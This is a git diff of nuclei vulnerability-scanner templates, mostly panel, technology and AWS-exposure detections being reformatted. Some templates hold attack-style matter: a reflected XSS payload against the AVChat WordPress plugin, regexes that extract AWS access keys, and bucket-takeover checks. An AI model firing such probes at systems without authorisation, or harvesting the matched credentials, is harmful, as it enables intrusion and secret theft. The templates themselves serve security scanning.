" - -# Enhanced by md on 2022/10/31 +# digest: 490a004630440220742c535fcf40b698ab4d4ac8550eecc886cdc968e67e6f78e7ac0d1dd3c602090220667eabb92d12f1e20876c1644b471fee43924eedcae0fd0a674e774d05a522e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/avchat-video-chat-xss.yaml b/nuclei-templates/Other/avchat-video-chat-xss.yaml index 0feaccd61a..e3a3d322ff 100644 --- a/nuclei-templates/Other/avchat-video-chat-xss.yaml +++ b/nuclei-templates/Other/avchat-video-chat-xss.yaml @@ -9,16 +9,16 @@ info: reference: - https://codevigilant.com/disclosure/wp-plugin-avchat-3-a3-cross-site-scripting-xss/ - https://wpscan.com/vulnerability/fce99c82-3958-4c17-88d3-6e8fa1a11e59 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cwe-id: CWE-80 metadata: verified: true - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 - cwe-id: CWE-79 - tags: xss,,wp,wpscan,wordpress,wp-plugin + max-request: 1 + tags: xss,wp,wpscan,wordpress,wp-plugin - -requests: +http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/avchat-3/index_popup.php?movie_param=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&FB_appId=FB_appId%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&" @@ -38,5 +38,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/09/07 +# digest: 490a00463044022002368646c707b96413ee07e487ea074e8d10a063907b76446f05c6c5efd75e9a022026a3f3fabe2061a078cf8d30212eb42aba57f2ead045e3d5805d6b6d460ddbd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/aviatrix-panel-608.yaml b/nuclei-templates/Other/aviatrix-panel-608.yaml new file mode 100644 index 0000000000..e8c89b1cca --- /dev/null +++ b/nuclei-templates/Other/aviatrix-panel-608.yaml @@ -0,0 +1,31 @@ +id: aviatrix-panel + +info: + name: Aviatrix Panel Login + author: pikpikcu,philippedelteil,daffainfo + severity: info + metadata: + shodan-query: http.title:"Aviatrix Cloud Controller" + tags: panel,aviatrix + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/assets/img/favicon-32x32.png" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: dsl + name: "title" + condition: and + dsl: + - 'contains(body, "Aviatrix")' + - 'contains(body, "Controller")' + - 'status_code == 200' + + - type: dsl + name: "favicon" + dsl: + - "status_code==200 && (\"7c1c26856345cd7edbf250ead0dc9332\" == md5(body))" diff --git a/nuclei-templates/Other/aviatrix-panel.yaml b/nuclei-templates/Other/aviatrix-panel.yaml deleted file mode 100644 index 9107535ba9..0000000000 --- a/nuclei-templates/Other/aviatrix-panel.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: aviatrix-panel - -info: - name: Aviatrix Cloud Controller Panel Login - author: pikpikcu,philippedelteil,daffainfo - severity: info - description: An Aviatrix Cloud Controller login panel was detected. - reference: - - https://docs.aviatrix.com/HowTos/controller_config.html - classification: - cwe-id: CWE-200 - metadata: - shodan-query: http.title:"Aviatrix Cloud Controller" - tags: panel,aviatrix - -requests: - - method: GET - path: - - "{{BaseURL}}" - - "{{BaseURL}}/assets/img/favicon-32x32.png" - - stop-at-first-match: true - matchers-condition: or - matchers: - - type: dsl - name: "title" - condition: and - dsl: - - 'contains(body, "Aviatrix")' - - 'contains(body, "Controller")' - - 'status_code == 200' - - - type: dsl - name: "favicon" - dsl: - - "status_code==200 && (\"7c1c26856345cd7edbf250ead0dc9332\" == md5(body))" - -# Enhanced by mp on 2022/03/23 diff --git a/nuclei-templates/Other/avideo-detect.yaml b/nuclei-templates/Other/avideo-detect.yaml index 69da940439..2f299a1fd5 100644 --- a/nuclei-templates/Other/avideo-detect.yaml +++ b/nuclei-templates/Other/avideo-detect.yaml @@ -6,17 +6,19 @@ info: severity: info metadata: verified: true + max-request: 1 shodan-query: http.title:"AVideo" fofa-query: "AVideo" tags: tech,avideo -requests: +http: - method: GET path: - "{{BaseURL}}" host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: regex @@ -35,3 +37,5 @@ requests: - type: status status: - 200 + +# digest: 4a0a00473045022100cf44559df8ac7ad08f8773c5424774c8df0edec3ba3f0828d263691c32f7464d02206f3c7f5afe59bc26e4f49303b4893ceb02b31aa4cd6eb8173f7c5e8053c7c16b:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/avideo-install.yaml b/nuclei-templates/Other/avideo-install.yaml index 44577e0daa..9cbd284ecd 100644 --- a/nuclei-templates/Other/avideo-install.yaml +++ b/nuclei-templates/Other/avideo-install.yaml @@ -11,11 +11,12 @@ info: cwe-id: CWE-459 metadata: verified: true + max-request: 1 shodan-query: http.title:"AVideo" fofa-query: "AVideo" - tags: panel,install,avideo + tags: panel,install,avideo,misconfig -requests: +http: - method: GET path: - "{{BaseURL}}/install/index.php" @@ -27,8 +28,13 @@ requests: words: - 'Install AVideo' + - type: word + part: body + negative: true + words: + - 'Your system is installed, remove the' + - type: status status: - 200 - -# Enhanced by md on 2022/10/31 +# digest: 4b0a00483046022100f6540411457d18242afa465a7b2ae500404d24cd51a1c8ccb353ca97c58aee24022100a88d1cf2a8087431f1b3761087fffff25c298d4ea251945ea74d1f4cc844685d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/AVideo-user-leakge.yaml b/nuclei-templates/Other/avideo-user-leakge.yaml similarity index 100% rename from nuclei-templates/Other/AVideo-user-leakge.yaml rename to nuclei-templates/Other/avideo-user-leakge.yaml diff --git a/nuclei-templates/Other/avigilon-panel.yaml b/nuclei-templates/Other/avigilon-panel.yaml index e2229f1ef2..e685f90c2b 100644 --- a/nuclei-templates/Other/avigilon-panel.yaml +++ b/nuclei-templates/Other/avigilon-panel.yaml @@ -7,14 +7,17 @@ info: description: Avigilon login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 + cpe: cpe:2.3:a:avigilon:avigilon_control_center:*:*:*:*:*:*:*:* metadata: - verified: true + max-request: 1 + product: avigilon_control_center shodan-query: http.title:"Login - Avigilon Control Center" + vendor: avigilon + verified: true tags: panel,avigilon -requests: +http: - method: GET path: - '{{BaseURL}}/cfg/login' @@ -36,5 +39,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/11/01 +# digest: 4b0a004830460221008a1100925f10bb7cfe702541f9583ad536cc6c872506c7491640e88651156dd5022100ec00500bb98ccd4e20c1c974b7df6f1fbdc4bd59a0be92da627e5e2279950f03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/avnil-pdf-generator-check.yaml b/nuclei-templates/Other/avnil-pdf-generator-check.yaml index 5b7bd4c129..44a798e2e9 100644 --- a/nuclei-templates/Other/avnil-pdf-generator-check.yaml +++ b/nuclei-templates/Other/avnil-pdf-generator-check.yaml @@ -9,7 +9,7 @@ info: - https://owasp.org/www-community/attacks/Credential_stuffing metadata: max-request: 1 - tags: login-check,avnil-pdf,creds-stuffing + tags: cloud,creds-stuffing,login-check,avnil-pdf self-contained: true @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402204b1e7e40c67c2247f9f558ddd4a992beee8ece82c1882a5e6c32181905e83489022048f5c5719753b894301591560cf8ce2b2b0d50dcb4fbfffa80a39bb0a96e7ab6:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502206b4fbc67413049130a87be6c047ed7ae4cb323da4b195608526619668e467272022100986ad99ae0c941bfef37cbd6df9fa30798f45445eaf38a1be2696c142122e7a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/avtech-avn801-camera-panel-611.yaml b/nuclei-templates/Other/avtech-avn801-camera-panel-611.yaml deleted file mode 100644 index 8bbb7ce6c5..0000000000 --- a/nuclei-templates/Other/avtech-avn801-camera-panel-611.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: avtech-avn801-camera-panel - -info: - name: Avtech AVN801 Network Camera Panel Detect - author: idealphase - severity: info - description: AVTECH offers a range of IP camera series with different shapes, resolutions and lens to fulfill different demands. Select the items needed to narrow down product search. - reference: http://www.avtech.com.tw - metadata: - shodan-query: title:"login" product:"Avtech AVN801 network camera" - tags: panel,avtech,iot,camera - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - words: - - "IP Surveillance for Your Life" - - "avtech" - - "/cgi-bin/guest/Login.cgi?rnd=" - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/avtech-avn801-camera-panel.yaml b/nuclei-templates/Other/avtech-avn801-camera-panel.yaml new file mode 100644 index 0000000000..a36f8957c2 --- /dev/null +++ b/nuclei-templates/Other/avtech-avn801-camera-panel.yaml @@ -0,0 +1,32 @@ +id: avtech-avn801-camera-panel + +info: + name: Avtech AVN801 Network Camera - Admin Panel Detection + author: idealphase + severity: info + description: An Avtech AVN801 Network Camera administration panel was detected. + reference: + - http://www.avtech.com.tw + metadata: + shodan-query: title:"login" product:"Avtech AVN801 network camera" + tags: panel,avtech,iot,camera + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - "IP Surveillance for Your Life" + - "avtech" + - "/cgi-bin/guest/Login.cgi?rnd=" + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/07/22 diff --git a/nuclei-templates/Other/AVTECH-login-bypass.yaml b/nuclei-templates/Other/avtech-login-bypass.yaml similarity index 100% rename from nuclei-templates/Other/AVTECH-login-bypass.yaml rename to nuclei-templates/Other/avtech-login-bypass.yaml diff --git a/nuclei-templates/Other/aws-access-id-620.yaml b/nuclei-templates/Other/aws-access-id-618.yaml similarity index 100% rename from nuclei-templates/Other/aws-access-id-620.yaml rename to nuclei-templates/Other/aws-access-id-618.yaml diff --git a/nuclei-templates/Other/aws-access-key-value-622.yaml b/nuclei-templates/Other/aws-access-key-value-622.yaml new file mode 100644 index 0000000000..52092fb630 --- /dev/null +++ b/nuclei-templates/Other/aws-access-key-value-622.yaml @@ -0,0 +1,18 @@ +id: aws-access-key-value + +info: + name: AWS Access Key ID Value + author: Swissky + severity: info + tags: exposure,token,aws,amazon + +requests: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" diff --git a/nuclei-templates/Other/aws-access-key-value-625.yaml b/nuclei-templates/Other/aws-access-key-value-625.yaml deleted file mode 100644 index b1f6dd5190..0000000000 --- a/nuclei-templates/Other/aws-access-key-value-625.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: aws-access-key-value - -info: - name: AWS Access Key ID Value - author: Swissky - severity: info - tags: exposure,token,aws,amazon - -requests: - - method: GET - path: - - "{{BaseURL}}" - - extractors: - - type: regex - part: body - regex: - - "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" diff --git a/nuclei-templates/Other/aws-access-secret-key.yaml b/nuclei-templates/Other/aws-access-secret-key.yaml index 8b3852ade1..edc3ab989d 100644 --- a/nuclei-templates/Other/aws-access-secret-key.yaml +++ b/nuclei-templates/Other/aws-access-secret-key.yaml @@ -5,10 +5,11 @@ info: author: tess severity: unknown metadata: - verified: "true" - tags: disclosure,aws,generic,exposure,amazon + verified: true + max-request: 1 + tags: disclosure,aws,exposure,amazon -requests: +http: - method: GET path: - '{{BaseURL}}' @@ -26,3 +27,5 @@ requests: - type: status status: - 200 + +# digest: 4b0a00483046022100a18f27b205b0f4d3b502a4ad5a326cc65b76afe8be03898378095eb657a54250022100a2ccd7b2cc4d37ff5a84631a0feed54b5fb00f69b5ec7da55a1957a58e73020c:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/aws-bucket-takeover-630.yaml b/nuclei-templates/Other/aws-bucket-takeover-630.yaml index e0d78b9f0e..786b470805 100644 --- a/nuclei-templates/Other/aws-bucket-takeover-630.yaml +++ b/nuclei-templates/Other/aws-bucket-takeover-630.yaml @@ -1,19 +1,23 @@ id: aws-bucket-takeover + info: name: AWS Bucket Takeover Detection - author: pdcommunity + author: pdteam severity: high - tags: takeover,aws + tags: takeover,aws,bucket reference: https://github.com/EdOverflow/can-i-take-over-xyz + requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word words: - "The specified bucket does not exist" + - type: dsl dsl: - contains(tolower(all_headers), 'x-guploader-uploadid') diff --git a/nuclei-templates/Other/aws-cloudfront-service-634.yaml b/nuclei-templates/Other/aws-cloudfront-service-634.yaml new file mode 100644 index 0000000000..26ab05d613 --- /dev/null +++ b/nuclei-templates/Other/aws-cloudfront-service-634.yaml @@ -0,0 +1,22 @@ +id: aws-cloudfront-service + +info: + name: AWS Cloudfront service detection + author: jiheon-dev + severity: info + description: Detect websites using AWS cloudfront service + tags: aws,tech,service + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: dsl + condition: or + dsl: + - "contains(tolower(all_headers), 'x-cache: hit from cloudfront')" + - "contains(tolower(all_headers), 'x-cache: refreshhit from cloudfront')" + - "contains(tolower(all_headers), 'x-cache: miss from cloudfront')" + - "contains(tolower(all_headers), 'x-cache: error from cloudfront')" diff --git a/nuclei-templates/Other/aws-cloudfront-service.yaml b/nuclei-templates/Other/aws-cloudfront-service.yaml deleted file mode 100644 index b247e81533..0000000000 --- a/nuclei-templates/Other/aws-cloudfront-service.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: aws-cloudfront-service - -info: - name: AWS Cloudfront service detection - author: jiheon-dev - severity: info - tags: aws,tech,service - description: Detect websites using AWS cloudfront service - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: dsl - condition: or - dsl: - - "contains(tolower(all_headers), 'x-cache: hit from cloudfront')" - - "contains(tolower(all_headers), 'x-cache: refreshhit from cloudfront')" - - "contains(tolower(all_headers), 'x-cache: miss from cloudfront')" - - "contains(tolower(all_headers), 'x-cache: error from cloudfront')" diff --git a/nuclei-templates/Other/aws-config.yaml b/nuclei-templates/Other/aws-config.yaml index 7e6889f667..47c84ecd77 100644 --- a/nuclei-templates/Other/aws-config.yaml +++ b/nuclei-templates/Other/aws-config.yaml @@ -9,9 +9,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: config,exposure metadata: + verified: true max-request: 1 + tags: config,exposure,aws,credential http: - method: GET @@ -20,16 +21,18 @@ http: matchers-condition: and matchers: + - type: regex + regex: + - 'aws_access_key_id\s*=\s*' + - 'region\s*=\s*' + - type: word + part: body words: - - "[default]" - - - type: dsl - dsl: - - "!contains(tolower(body), 'AWS Elastic Beanstalk overview' - - '
  • AWS Elastic Beanstalk overview
    • ' - condition: or - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - '([A-Za-z -]+)<\/title>' diff --git a/nuclei-templates/Other/aws-elastic-beanstalk-detect.yaml b/nuclei-templates/Other/aws-elastic-beanstalk-detect.yaml new file mode 100644 index 0000000000..532f1b9aee --- /dev/null +++ b/nuclei-templates/Other/aws-elastic-beanstalk-detect.yaml @@ -0,0 +1,31 @@ +id: elastic-beanstalk-detect + +info: + name: AWS Elastic Beanstalk Detect + author: pussycat0x + severity: info + tags: aws,tech,beanstalk + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - '<li><a href="http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/Welcome.html">AWS Elastic Beanstalk overview</a></li>' + - '<li><a href="http://docs.amazonwebservices.com/elasticbeanstalk/latest/dg/">AWS Elastic Beanstalk overview</a></li>' + condition: or + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '<title>([A-Za-z -]+)<\/title>' diff --git a/nuclei-templates/Other/aws-opensearch-login-649.yaml b/nuclei-templates/Other/aws-opensearch-login-649.yaml index 14f111d73a..5e1bc2b728 100644 --- a/nuclei-templates/Other/aws-opensearch-login-649.yaml +++ b/nuclei-templates/Other/aws-opensearch-login-649.yaml @@ -1,5 +1,4 @@ id: aws-opensearch-login - info: name: AWS OpenSearch Default Login author: Higor Melgaço (eremit4) @@ -8,18 +7,15 @@ info: reference: - https://aws.amazon.com/pt/blogs/opensource/introducing-opensearch/ tags: panel,opensearch,aws - requests: - method: GET path: - '{{BaseURL}}/_dashboards/app/login' - matchers-condition: and matchers: - type: status status: - 200 - - type: word words: - - "Please login to OpenSearch Dashboards" \ No newline at end of file + - "Please login to OpenSearch Dashboards" diff --git a/nuclei-templates/Other/aws-redirect-652.yaml b/nuclei-templates/Other/aws-redirect-652.yaml new file mode 100644 index 0000000000..010dbbfeca --- /dev/null +++ b/nuclei-templates/Other/aws-redirect-652.yaml @@ -0,0 +1,24 @@ +id: aws-redirect + +info: + name: Subdomain takeover AWS S3 + author: manikanta a.k.a @secureitmania + severity: info + reference: https://link.medium.com/fgXKJHR9P7 + tags: aws + +requests: + - method: GET + path: + - '{{BaseURL}}' + + redirects: false + matchers-condition: and + matchers: + - type: status + status: + - 307 + - type: word + words: + - 'Location: https://aws.amazon.com/s3/' + part: header diff --git a/nuclei-templates/Other/aws-redirect-654.yaml b/nuclei-templates/Other/aws-redirect-654.yaml deleted file mode 100644 index 1826635a49..0000000000 --- a/nuclei-templates/Other/aws-redirect-654.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: aws-redirect - -info: - name: Subdomain takeover AWS S3 - author: manikanta a.k.a @secureitmania - severity: info - reference: https://link.medium.com/fgXKJHR9P7 - tags: aws,takeover - -requests: - - method: GET - path: - - '{{BaseURL}}' - - redirects: false - matchers-condition: and - matchers: - - type: status - status: - - 307 - - type: word - words: - - 'Location: https://aws.amazon.com/s3/' - part: header diff --git a/nuclei-templates/Other/aws-s3-explorer.yaml b/nuclei-templates/Other/aws-s3-explorer.yaml index 0f14918cbb..4b41eb224e 100644 --- a/nuclei-templates/Other/aws-s3-explorer.yaml +++ b/nuclei-templates/Other/aws-s3-explorer.yaml @@ -1,17 +1,23 @@ id: aws-s3-explorer info: - name: AWS S3 Explorer + name: Amazon Web Services S3 Explorer - Detect author: DhiyaneshDk - severity: low + severity: medium + description: Amazon Web Services S3 Explorer page was detected. Page contains links to sensitive information. reference: - https://www.exploit-db.com/ghdb/7967 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 metadata: verified: true + max-request: 1 google-query: inurl:s3.amazonaws.com intitle:"AWS S3 Explorer" tags: s3,edb,misconfig,aws,amazon -requests: +http: - method: GET path: - "{{BaseURL}}/index.html" @@ -30,3 +36,5 @@ requests: - type: status status: - 200 + +# digest: 4a0a0047304502205fce419ac3d0a664585c93c727a799c3d68f9fac6796f3ead48bc2b31ca037f5022100919b5659cd25594daf725aa14fac287c4d0d2527293012b2da8c29308e5102fe:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/aws-xray-application.yaml b/nuclei-templates/Other/aws-xray-application.yaml index 2ad692af12..8621b81796 100644 --- a/nuclei-templates/Other/aws-xray-application.yaml +++ b/nuclei-templates/Other/aws-xray-application.yaml @@ -9,10 +9,11 @@ info: - https://www.facebook.com/ExWareLabs/photos/a.361854183878462/5566269380103557/ metadata: verified: true + max-request: 1 shodan-query: title:"AWS X-Ray Sample Application" tags: misconfig,aws,x-ray,amazon -requests: +http: - method: GET path: - "{{BaseURL}}" @@ -32,3 +33,5 @@ requests: - type: status status: - 200 + +# digest: 4a0a00473045022100dbe3c017b302cdf46850fa902720549499d2f9397a3fc4f9cfa7d8b4a6cec319022067762d58480d093919ffeda2e012fb6e00014e4b2c8b21f764a71a49d829a7bb:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/awstats-listing.yaml b/nuclei-templates/Other/awstats-listing.yaml index 30d7c58c91..a52056d0c2 100644 --- a/nuclei-templates/Other/awstats-listing.yaml +++ b/nuclei-templates/Other/awstats-listing.yaml @@ -5,16 +5,17 @@ info: author: tess severity: low description: Searches for exposed awstats Internal Information. + metadata: + max-request: 1 tags: misconfig,aws,exposure,amazon,awstats,oss -requests: +http: - method: GET path: - "{{BaseURL}}/awstats/data" matchers-condition: and matchers: - - type: word part: body words: @@ -25,3 +26,5 @@ requests: - type: status status: - 200 + +# digest: 4a0a004730450220245efaddd842982f46f8eaa5737bc4e1a85fa38340f97a29dbc5012cb135f745022100fa5de8029489b49cd144c2b06f80ed0e1a785293d839c76d957afd58f61778ff:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/awstats-script-658.yaml b/nuclei-templates/Other/awstats-script-658.yaml index 9a81b722f3..3631c6a328 100644 --- a/nuclei-templates/Other/awstats-script-658.yaml +++ b/nuclei-templates/Other/awstats-script-658.yaml @@ -4,7 +4,7 @@ info: name: AWStats script author: sheikhrishad severity: info - tags: config,exposure + tags: config,exposure,awstats requests: - method: GET @@ -20,9 +20,9 @@ requests: - "Do not remove this line" - type: word + part: header words: - "application/x-perl" - part: header - type: status status: diff --git a/nuclei-templates/Other/axel-webserver.yaml b/nuclei-templates/Other/axel-webserver.yaml index e59777817e..4bf951cac5 100644 --- a/nuclei-templates/Other/axel-webserver.yaml +++ b/nuclei-templates/Other/axel-webserver.yaml @@ -7,15 +7,15 @@ info: description: Axel WebServer panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 metadata: - verified: true - shodan-query: http.title:"Axel" fofa-query: app="AxelWebServer" + max-request: 1 + shodan-query: http.title:"Axel" + verified: true tags: panel,axel,webserver -requests: +http: - method: GET path: - "{{BaseURL}}" @@ -37,5 +37,4 @@ requests: group: 1 regex: - 'Axel MyWeb (.*)' - -# Enhanced by md on 2022/11/01 +# digest: 4a0a0047304502210096153e74c6a2e5ac1654dba3ab425d62798426f6989aabf3d67a1971b7319c1502206fd9fb03d2f6bc24884cc51fa767485e2bfcdde7809c9f7c54733fff531f3fde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/axigen-mail-server-detect.yaml b/nuclei-templates/Other/axigen-mail-server-detect.yaml index f81ad80603..86d00cf935 100644 --- a/nuclei-templates/Other/axigen-mail-server-detect.yaml +++ b/nuclei-templates/Other/axigen-mail-server-detect.yaml @@ -4,22 +4,26 @@ info: name: Axigen Mail Server Detection author: pikpikcu severity: info + description: | + Axigen Mail Server was detected. metadata: - verified: true fofa-query: app="axigen-Mail-Server" + max-request: 1 shodan-query: product:"Axigen" - tags: network,axigen + verified: true + tags: network,axigen,detect,smtp -network: +tcp: - inputs: - data: "\n" host: - "{{Hostname}}" - - "{{Host}}:25" + port: 25 matchers: - type: word words: - "Axigen ESMTP" - "AXIGEN" +# digest: 4b0a00483046022100e1fa011d406f62fafa793206aa46b39b74acd39b8d5e853c603698edd112e9a2022100b13d7b060a09c9579aa32b707cbf6d4b45a7c7a6eddee8ea75b8d34813f0800a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/axigen-webadmin-660.yaml b/nuclei-templates/Other/axigen-webadmin-660.yaml index 0e54704559..515f319cbe 100644 --- a/nuclei-templates/Other/axigen-webadmin-660.yaml +++ b/nuclei-templates/Other/axigen-webadmin-660.yaml @@ -7,14 +7,11 @@ info: description: An Axigen Web Admin panel was discovered. reference: - https://www.axigen.com/ - metadata: - shodan-query: 'http.title:"Axigen WebAdmin"' - tags: axigen,panel classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: cwe-id: CWE-200 + metadata: + shodan-query: http.title:"Axigen WebAdmin" + tags: axigen,panel requests: - method: GET diff --git a/nuclei-templates/Other/axigen-webmail-662.yaml b/nuclei-templates/Other/axigen-webmail-662.yaml new file mode 100644 index 0000000000..0b61e4d8bd --- /dev/null +++ b/nuclei-templates/Other/axigen-webmail-662.yaml @@ -0,0 +1,40 @@ +id: axigen-webmail + +info: + name: Axigen WebMail PanelDetection + author: dhiyaneshDk,idealphase + severity: info + description: An Axigen webmail panel was discovered. + reference: + - https://www.axigen.com/ + classification: + cwe-id: CWE-200 + metadata: + shodan-query: http.title:"Axigen WebMail" + tags: axigen,panel + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)(Axigen WebMail)' + - 'Axigen Standard Webmail - (.*)' + condition: or + + - type: status + status: + - 200 + + extractors: + - type: regex + group: 1 + part: body + regex: + - '' + - '' + - 'Bolt requires JavaScript to function properly and continuing without it might corrupt or erase data.' + - 'Bolt » Login' + - 'Cookies are required to log on to Bolt. Please allow cookies.' + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/bolt-cms-panel-763.yaml b/nuclei-templates/Other/bolt-cms-panel-763.yaml deleted file mode 100644 index 89c9f2e25c..0000000000 --- a/nuclei-templates/Other/bolt-cms-panel-763.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: bolt-cms-panel - -info: - name: bolt CMS Login Panel - author: cyllective,daffainfo - severity: info - description: Bolt is a simple CMS written in PHP. It is based on Silex and Symfony components, uses Twig and either SQLite, MySQL or PostgreSQL. - reference: - - https://github.com/bolt/bolt - tags: panel,bolt,cms,login - -requests: - - method: GET - path: - - "{{BaseURL}}/bolt/login" - - matchers-condition: and - matchers: - - type: word - part: body - condition: or - words: - - '